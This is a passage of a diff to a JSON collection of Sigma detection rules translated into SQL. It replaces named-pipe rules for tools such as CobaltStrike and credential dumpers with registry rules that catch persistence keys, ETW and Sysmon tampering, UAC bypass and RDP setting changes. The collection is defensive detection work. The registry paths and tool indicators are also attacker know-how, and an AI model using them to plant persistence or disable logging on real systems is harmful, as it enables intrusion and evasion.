'\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' 
OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Valid Macros and/or internal documents" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.privilege_escalation", + 
"attack.t1547.003" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1574.012" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE 
'\\'))" + ], + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + }, + { + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' 
OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects 
changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" + "SELECT * 
FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName 
REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": 
"CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", - "status": "experimental", - 
"description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto 
Rodriguez @Cyb3rWard0g", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.005", + "attack.t1059.007" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_mal_adwind.yml" + }, + { + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND 